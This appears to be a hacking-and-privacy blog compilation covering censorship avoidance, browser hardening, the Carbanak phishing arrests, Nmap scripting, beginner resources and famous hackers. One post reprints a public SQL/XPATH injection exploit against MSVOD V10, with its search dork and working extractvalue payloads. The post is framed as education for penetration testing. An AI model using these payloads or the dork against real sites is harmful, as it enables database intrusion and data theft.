How To Protect Yourself From Corporate Censorship

  • Use Decentralized alternatives.
  • Fire up that VPN
  • Fortify your browser and your devices
  • Utilize Aliases for your own protection

Decentralized alternatives to popular websites on the internet are slowly beginning to pop up and gain prevalence as we are seeing increased prevalence on various media sources. Alternatives to youtube and other social networking sites like DTube exist. Here is an article listing 4 popular decentralized Social media platforms. Entirely decentralized portions of the internet are currently being tested. And of course we obviously have anonymizing darkwebs such as Tor, Freenet and I2P. However I would be an idiot not to note the fact that these platforms have had extreme amounts of trouble gaining any sort of traction with their target audience due to the fact that they lack the addictive simplicity that services like Instagram, Facebook, and Youtube have. Only time will tell if one of these platforms will gain enough popularity to become viable alternatives to what we currently have.

Get a paid VPN. Securing your connection to the internet is of the utmost importance due to the potential for 3rd party eves-droppers and the fact that we really don’t know what information is being given away by our internet service providers.

Utilize TOR or some other encrypted peer to peer darknet like I2P or Freenet. These systems are for the ultra-paranoid, and I don’t really recommend them for the average user who is simply trying to protect themselves  preemptively.

Be careful what you download and get an Antivirus. Utilize www.virustotal.com to see if the file you have downloaded shows up on ANY antivirus. You can also use nodistribute.com if you don’t want your scan results sent to the antivirus companies. Protecting yourself from malware can help prevent your privacy from being invaded by governments or people.

Know your rights. Google around to know what the copyright and internet laws are in your area. Be aware of what the government can and cannot do to you legally.

Utilize secure Open Source software and host your own servers. Offshore servers may sometimes be necessary in the absolute worst cases of censorship. Open Source will ensure that no company will be able to revoke access to the software. The government hates open source because they can’t get their backdoors implanted into the code as easily, although it has potentially happened so be aware.

Note: I am speaking about all this in wake of the recent Mass censoring of Alex Jones and Infowars. Regardless of what your political ideology is, everyone deserves to be able to have their ideas heard. In current times, Corporate Censorship is a new breed altogether. Normally it would be the government, but with big corporate run media platforms anyone can be censored off the platforms if it serves the corporate interest. I’m no anti-capitalist. Quite the contrary, but I do think we need to push the free market in a direction that prevents censorship. Decentralized platforms and Open Source software can help with this. Stay safe.

 

Why Hacking Computers Will Free Your Mind.

Today children are indoctrinated at a young age into school systems around the world. These school systems use the same teaching methods that they’ve been using for hundreds of years. No one thinks to question why we haven’t changed our methods. That is because public school systems are extremely efficient at producing one thing. That thing is Laborers. Some people go to college and become skilled laborers, but most do not and remain unskilled laborers.

Laborers are very good at completing sets of tasks given to them by whoever is in charge. In other words, Laborers are machines that complete a given set of instructions.

Hmmm…. That sounds alot like a computer. So through a 12-13 year process, humans are brainwashed and turned into machines that complete tasks. The problem with this is that the process of rewiring humans to complete monotonous tasks en repertoire causes their minds to become rigid. The children slowly lose the ability to imagine and problem solve.

Anyone who struggles and holds to their imagination is immediately seen as a problem child and is either remediated or medicated. Energetic young kids who would rather be outside experiencing life? ADHD. Kids who don’t struggle but rather become sluggish and unmotivated due to the repetitive nature of their tasks? Depressed. It takes years to get a doctorate degree in psychology but It only takes a few minutes for a kindergarten teacher to recommend children take legal meth.

Compound this with the fact that nobody except the elite gets taught anything about personal finance. They’re setting you up not only to be a brain-dead figurative (or literal) assembly-line worker, but a debt slave. Slavery never ended. It just evolved.

The answer is to focus on legitimate problem solving skills and reasoning. That compounded with a solid understanding of personal finance will bring you the freedom that you know you desire in your heart of hearts. I don’t care if you’re 15 or 55. If you have those two things, you’ll make it out and nobody will be able to tell you what to do.

There are many disciplines that teach problem solving and reasoning. Engineering, mathematics, chemistry, philosophy, business, finance, Computer Science, hacking. Any of these fields (and plenty that I missed) are respectable and will get you somewhere if you apply yourself. But If you’ve come to this blog in particular then you know which one I lean towards.

Its the information age. Everything is increasingly influenced by computer networks and software. If you fully understand all of the networks and all of the software, then effectively; you are god.

But anyone who has done even a little bit of hacking knows that the more you learn in this profession, the more you begin to realize that you don’t know shit. The same could be said about alot of the theoretical branches of science, but I can tell you that as we speak there is likely software being developed by some guy in his basement that will turn our world upside down within a few weeks, months or even years. Change is constant. Being forced to accept and adapt to this will grant you flexibility of mind. Thats why most college graduates can’t handle infosec in any respectable manner. They were taught on node.js when today everyone is using react and tomorrow they will be using angular. You get the picture.

This is a call to action of sorts. Go out there and solve problems. Download the Metasploitable 2 VM and start trying to hack it. Its like a puzzle and you will definitely gain something from the experience.

Social Engineering In Action. Ukranian Hackers Busted!

Free picture (Corruption in Ukraine Ukrainian hackers) from https://new.torange.biz/fx/corruption-ukraine-ukrainian-hackers-172199

The Hack

Three Ukranian hackers connected to attacks on over 100 American businesses have been arrested. They used social engineering attacks and phishing attacks to steal financial information from a lot of businesses.  These hackers were part of the Carbanak Group

Frequently the group would send emails disguised as hotel reservations. Said emails would contain malware designed to steal sensitive data.

The Carbanak Group sent an FDA food poisoning related email to a restaurant. They attached a list of “inspections and checks” which the business opened. Of course, the attachment contained malware.

Dmytro Fedorov, Fedir Hladyr and Andrii Kolpakov are being charged with wire fraud, conspiracy, computer hacking, access device fraud, and identity theft. So it looks like jail time is very likely for the Carbanak Group.

How to prevent

What can I do to prevent such an attack on my personal life or business? Social Engineering attacks are becoming extremely common today, because they are very easy to create and they tend to have a very high payoff for the hacker. First you need to know what phishing is. Phishing is when a hacker disguises some form of web service, message or other form of correspondence to make it appear like its coming from a legitimate source.

So my main advice is to always check the URL. Make sure it is secure (https) and if it has a SSL certificate thats even better. If you recieve an email always look at the domain of the email. Any misspellings in the domain can mean that its fake. If there are attatchments do not open them until you have verification that they are safe. If you cannot get verification that its from a legitimate source, you can always scan the attatchments before opening them, or analyze them within a VM.

Do not give your password away via plaintext ever. Use a VPN if you’re in public as there are potentially people who could be evesdropping on public networks (like at a Starbucks or Mcdonalds Wi-Fi) And Install an Anti-Virus on your PC. Also get the antivirus’s browser addon. These addons can tell you if the site has been reported as a hacked hacked site or a phishing attack.

XPATH SQL Injection Using a Recent Example

Xpath Injection

I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. Its a bit more tedious because you’ll have to use limit most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”

OWASP logo

Here Is OWASPs’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.

Example exploit

# Exploit Title: MSVOD V10 ¡V SQL Injection # Google Dork: inurl:"images/lists?cid=13" # Date: 2018/07/17 # Exploit Author: Hzllaga # Vendor Homepage: http://www.msvod.cc/ # Version: MSVOD V10 # CVE : CVE-2018-14418 #Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/ Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
You can tell by looking at the payload that this is an XPATH injection because of the simple fact that it is using “extractvalue”.
Here the cid parameter is vulnerable. But if you were to try union based injection it wouldn’t work. There are a few things to try in this scenario, but one of them is extractvalue.
The actual payload would be
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Other than the Union Select being missing there is really no difference in the injection.
However, In some cases with XPATH injection you will be stuck going by single lines which can be very time consuming. You will have to use
Limit 0,1, limit 1,1, limit 2,1, etc
One example payload where you’d have to use this method:
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Here is a link to a useful tutorial on XPATH injections. The english is a little bad, but if you have any questions don’t hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
The exploit-db and CVE:

NSE Nmap has Hidden Potential

Nmap is THE go-to tool for network mapping. What you might not know is that it also has an absurd amount of power and flexibility due to the fact that it also functions as a vulnerability scanner and an exploitation framework! Not only that, but it also doubles as a replacement for netcat, aka The hacker’s sswiss army knife. Yep. every recent Nmap installation comes with Ncat, the modernized clone of netcat that supports ssl encryption. Making it the more practical of the two in today’s age of encryption.

Example usage:

$ ncat 192.168.1.100 80

Image result for billy mays

But wait there’s more!

Nmap now has the Nmap Scripting Engine. This gives it way more versatility than ever before. None of this is new news to alot of people I realize, but its a bit impressive if you take a step back and think about the fact that Nmap started off as a simple portscanner.

To use NSE we must first locate where all the scripts are so we can know what we’ve got as well as where to put new scripts that we might code ourselves and also where to put scripts we’ve taken from the internet.

If you’re on linux just type “locate *.nse”

$ locate *.nse
/usr/share/nmap/scripts/acarsd-info.nse
/usr/share/nmap/scripts/address-info.nse
/usr/share/nmap/scripts/afp-brute.nse
/usr/share/nmap/scripts/afp-ls.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/afp-serverinfo.nse
/usr/share/nmap/scripts/afp-showmount.nse
/usr/share/nmap/scripts/ajp-auth.nse
/usr/share/nmap/scripts/ajp-brute.nse
/usr/share/nmap/scripts/ajp-headers.nse
/usr/share/nmap/scripts/ajp-methods.nse
/usr/share/nmap/scripts/ajp-request.nse
/usr/share/nmap/scripts/allseeingeye-info.nse
/usr/share/nmap/scripts/amqp-info.nse
/usr/share/nmap/scripts/asn-query.nse
...

Now we know where the scripts are installed, but how do we use it?

$ nmap -sC TargetNameHere

The above command will run the default scripts against a target (url or IP). The following is an example of how to use a specific script against a target.

$ nmap --script smb-check-vulns-nse 192.168.1.1

Now you know the basics, but the trick is to go out and learn how to write your own scripts. I’ll do that in a later tutorial if its asked for, but in the mean time, go and see if you can find some nse scripts written by other people. There is alot that people have accomplished on their own. Thats the beauty of open source. One example of this is nmap vulnerability scan on github (link below) They have a script that connects to several regularly updated vulnerability databases and scans from those. Check the github for usage and installation instructions. This is a powerful tool, so I leave it in your hands. Don’t do anything stupid with it.

https://github.com/scipag/vulscan

How to Fortify your Browser (Chrome/Firefox)

The point of this add-on is to get 3rd party advertisements out of your web browser which will help minimize the parties involved. Next is get NoScript (firefox) or ScriptSafe (chrome). This will allow you to selectively block various client side script features on websites thus making it safer to browse. Now get Self Destructing Cookies (firefox) or Cookie AutoDelete (chrome). These addons will destroy cookies when you close a connection (close a tab) with a website which will prevent them from tracking you. Keep in mind however that they can still track you if you keep the tab open. Another great addon to try for both chrome and firefox is Disconnect. This addon will allow you to block various tracking requests.

The next thing you’ll want to do is utilize incognito mode (for chrome) OR open a new private window (for firefox) Both of these will put you in a browsing mode that won’t keep browsing history, cookies, or any site-specific information like login credentials.

You’ll also want a private paid VPN such as NordVPN. Remember that free VPNs are slow and insecure at best. At worst, they’re selling your information to 3rd parties. Remember: If they’re not selling you something, they’re selling you. 

Finally, for the majority of users I recommend an AntiVirus for obvious reasons. And also I recommend a password manager such as Dashlane . Remembering every single password in this day and age is nearly impossible, so there is a great temptation to get your browser to do it for you. Don’t do this. There is malware specifically coded to steal credentials from the most popular browsers like Internet Explorer, Microsoft Edge, Firefox, Chrome, Safari, Opera, Iceweasel, etc.

That just about wraps it up for basic browser security. There are a few custom modifications you can make to the browser themselves but that goes beyond the scope of this article. If this article recieves enough likes or I get enough requests, I’ll make a tutorial on modifying the most popular browsers for privacy.

Note: Please remember that there is a difference between security, privacy and anonymity. Achieving anonymity online goes beyond the scope of this article. 

How Hackers Legally Earn Money From Home

Keyword here is legally because what good is a million dollars if you’re in jail right? So keep reading if you want to know how hackers escape the 9-5 wageslave system that is making everyone suicidally depressed.

Penetration Testing. I figured I’d start off with an obvious one. The most obvious way that hackers are making money from home. Companies and even small websites are paranoid that they’ll be the next headline database breach on the news and so they’re willing to pay big bucks to make sure that doesn’t happen and so if you can earn the qualifications necessary to start freelancing you can potentially be earning a comfortable salary from home by pentesting.

Writing. here is one you probably didn’t think of. Hackers often get paid to write articles for technical companies. Often times they’ll even get paid to contribute to blogs like this one!

Coding. This is another obvious one. You’re not a real hacker unless you can code. So why not make money off of that skill. Freelance programmers and web developers are in high demand these days so job availability won’t be a big issue as long as you can market yourself. Knowing some coding languages can pay better than others though.

Helping Companies prevent theft. You might think I already covered this one with Penetration Testing. However, most if not all hackers have a thorough background or understanding of IT. Hackers can get paid by companies to place security measures like web application firewalls, antiviruses, encryption protocols and network firewalls. Knowing IT and network configuration pays off.

Best Resources to get Started Hacking as a Beginner

So In the future I will do an all encompassing tutorial on what you should do in order to get started with hacking. But In this article I’m going to give you a list of great resources that helped me get from beginner to intermediate (at which point you should have a pretty clear idea of what you need to do).

  1. Codecademy
  2. Cybrary
  3. Hacksplaining

Thats it…..                                                                                                                                  Well sort of. That’s all you need to get started with  the basics. First I’d recommend learning HTML, CSS, Javascript, Python and command line basics on codecademy. That won’t take you long at all. Once you’ve done that, head over to cybrary and take a look at some of their courses. At minimum you’ll want to find a course that will take you over the basics of how networking works. The most comprehensive free overview of networking would probably be the Networking+ course. Then you could take a look at their Linux+ course. Both of these courses will supposedly prepare you for the comptia certifications which is something to look into if you’re interested in a career in IT. The next thing you’ll want to do is head over to Hacksplaining and go through all their vulnerability overviews. They only cover web vulnerabilities but It’ll be a decent foundation for you as a newbie hacker. Understanding the OWASP top 10 vulnerabilities is an absolute must these days in my opinion.

Bonus!

  1. Metasploit Unleashed
  2. VulnHub

By this point you’re somewhat of an intermediate. You’ve got the basics of a few coding languages, you’ve got an understanding of Linux, networking and you have an idea of what a vulnerability is. Metasploit unleashed will teach you how to actually use vulnerabilities to compromise a system. This is where the real hacking begins. On top of that you’ll learn one of the quintessential industry standard hacking tools Metasploit. After you’ve completed metasploit unleashed go check out VulnHub for some vulnerable VMs that you can practice your skills on. Start with the tried and true ones like Mr. Robot and Kioptrix so you can follow along the write ups (tutorials) until you gain a thorough understanding.

And did I mention that all these resources are FREE? yep. You don’t have to spend a dime to become a master hacker. Don’t listen to anyone who tells you that you do.

And after doing all that you’ll be a pro. except not really.

Top 10 Most Infamous Hackers

Kevin Mitnick a famous white hat hacker is now a professional security consultant and entrepreneur. His among his exploits are the Pentagon, Nokia, and Motorola. He eventually got convicted and served 5 years in prison. Once he got out he became the rich security consultant we know today. Does crime pay? Perhaps if your reputation precedes you.

Gary Mckinnon hacked into 97 U.S. Military and NASA computers during 2001 and 2002. He was looking for information on UFOs and evidence of a conspiracy that the US government was hiding technologies that could solve the energy crisis. He also shut down 1000 government computers and somehow rendered 300 of the inoperable causing up to $700,000 in damages. Eventually he got caught but he dodged charges because he was Scottish and they denied his extradition.

Jonathan James AKA c0mrade started hacking as a kid and was the first minor to be arrested and sent to prison at the age of 16. He hacked into the Defense Threat Reduction Agency and NASA. He downloaded source code used for the International Space Station. He committed suicide in 2008 because he was afraid he was going to be wrongfully imprisoned for several attacks on corporate networks that he was under suspicion for.

Adrian Lamo would often hack into media sources and change details on the website. He would then notify the owners of the press source and help them fix their security. However when he hacked into the New York Times he got arrested. Though later on in life he eventually ended up helping out law enforcement by turning Chelsea Manning for being a source to WikiLeaks which he now deeply regrets. Fun fact about Adrian Lamo: He had Asperger syndrome.

Ryan Collins was the hacker (or social engineer rather) behind “the fappening” a hilarious exploit where Collins used the standard email phishing attack to gain access to celebrity iCloud accounts where he was then able to obtain a whole bunch of their photos. Many of said photos happened to be sensitive. In fact, they were nude photos of several famous celebrities including Jennifer Lawrence, Kate Upton, and Kirstin Dunst. Several celebrities chose to deny authenticity of the leaks including Ariana Grande.

Albert Gonzalez installed a sniffer in various corporate networks and was able to steal millions of users credit cards and ATM details. Apparently he sold about 170 million pieces of sensitive data resulting in one of the largest cases of identity theft ever.

Astra is said to be a 58 year old greek mathematician who hacked into a french corporation called Dassault Group and he sold sensitive weapons information to various companies over a period of five years. When authorities caught him in 2008 they never revealed his information but just said that he was a 58 year old greek mathematician. It just goes to show how versatile a degree in mathematics really is.

Kevin Poulsen stole wiretap info from the FBI, hacked a radio stations phone lines in order to win a Porsche, helped law enforcement catch 744 sex predators over MySpace and is now a senior editor for Wired. How does your resume compare to that?

Loyd Blankenship 

I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

You may recognize this quote from the hacker manifesto. This famous manifesto was written by none other than Loyd Blankenship. His writings helped to inspire a generation of hackers to drop the controller and pick up a linux distro. He was a member of the Legion of Doom hacker group and has been hacking since the 70s. You could call him one of the fathers of modern hacking. Whatever you call him, he’s definitely an OG.

 

Julian Assange started hacking when he was 16. He broke into NASA, the Pentagon Citibank, Stanford, and Lockheed Martin. His biggest accomplishment was founding WikiLeaks. He is currently in the Ecuadorian Embasy in London trying to prevent his Extradition.

What is a Social Engineer?

Social engineers are nothing new to society. In some sense they’ve always existed but they’ve just been going by different names. Conman, grifter, flimflammer, trickster. I think you get the point. A social engineer is a person who uses his social skills to manipulate people or organizations (or in some cases entire societies) into giving him what he wants.

Micro scale social engineering however is very different from macro scale social engineering. An example of micro scale social engineering would be when a conman tricks someone into lending him money and not giving it back (an inelegant con, but a con none the less). An example of macro scale social engineering would be wartime propaganda used to convince a society to support the war effort.

So where does this become relevant to me as a hacker? If you’re hacking a target you may find that public exploits are not available because the target is kept up to date and security is seemingly airtight. But often times the weakest link in an organization is the human behind the desk. With social engineering you won’t even have to crack open your terminal to gain sensitive data and potentially access to a target. I’ll cover more in depth about methods employed by social engineers in future articles, but a great book to learn more about social engineering from a hackers perspective would be Social Engineering: The art of Human Hacking. Go check it out or google around and do some research of your own.